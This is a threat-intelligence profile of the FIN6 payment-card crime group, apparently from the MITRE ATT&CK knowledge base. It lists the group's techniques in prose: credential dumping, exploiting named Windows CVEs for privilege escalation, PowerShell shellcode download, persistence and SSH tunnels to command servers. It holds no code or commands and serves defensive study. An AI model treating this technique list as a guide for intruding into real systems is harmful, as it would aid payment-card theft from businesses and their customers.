FIN6

FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors. [1]

ID: G0037
Aliases: FIN6
Version: 1.0

Alias Descriptions

NameDescription
FIN6[1]

Techniques Used

DomainIDNameUse
EnterpriseT1087Account DiscoveryFIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.[1]
EnterpriseT1119Automated CollectionFIN6 has used a script to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.[1]
EnterpriseT1003Credential DumpingFIN6 has used Windows Credential Editor for credential dumping, as well as Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.[1]
EnterpriseT1002Data CompressedFollowing data collection, FIN6 has compressed log files into a ZIP archive prior to staging and exfiltration.[1]
EnterpriseT1022Data EncryptedTRINITY malware used by FIN6 encodes data gathered from the victim with a simple substitution cipher and single-byte XOR using the OxAA key.[1]
EnterpriseT1074Data StagedTRINITY malware used by FIN6 identifies payment card track data on the victim and then copies it to a local file in a subdirectory of C:\Windows\. Once the malware collects the data, FIN6 actors compressed data and moved it to another staging system before exfiltration.[1]
EnterpriseT1068Exploitation for Privilege EscalationFIN6 has used tools to exploit Windows vulnerabilities in order to escalate privileges. The tools targeted CVE-2013-3660, CVE-2011-2005, and CVE-2010-4398, all of which could allow local users to access kernel-level privileges.[1]
EnterpriseT1046Network Service ScanningFIN6 used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.[1]
EnterpriseT1086PowerShellFIN6 has used a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.[1]
EnterpriseT1060Registry Run Keys / Startup FolderFIN6 has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.[1]
EnterpriseT1076Remote Desktop ProtocolFIN6 used RDP to move laterally in victim networks.[1]
EnterpriseT1018Remote System DiscoveryFIN6 used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.[1]
EnterpriseT1053Scheduled TaskFIN6 has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and PoS malware known as TRINITY.[1]
EnterpriseT1064ScriptingFIN6 has used a Metasploit PowerShell module to download and execute shellcode and to set up a local listener. FIN6 has also used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.[1]
EnterpriseT1071Standard Application Layer ProtocolFIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.[1]
EnterpriseT1032Standard Cryptographic ProtocolFIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.[1]
EnterpriseT1078Valid AccountsTo move laterally on a victim network, FIN6 has used credentials stolen from various systems on which it gathered usernames and password hashes.[1]

Software

IDNameTechniques
S0029PsExecService Execution, Windows Admin Shares
S0005Windows Credential EditorCredential Dumping

References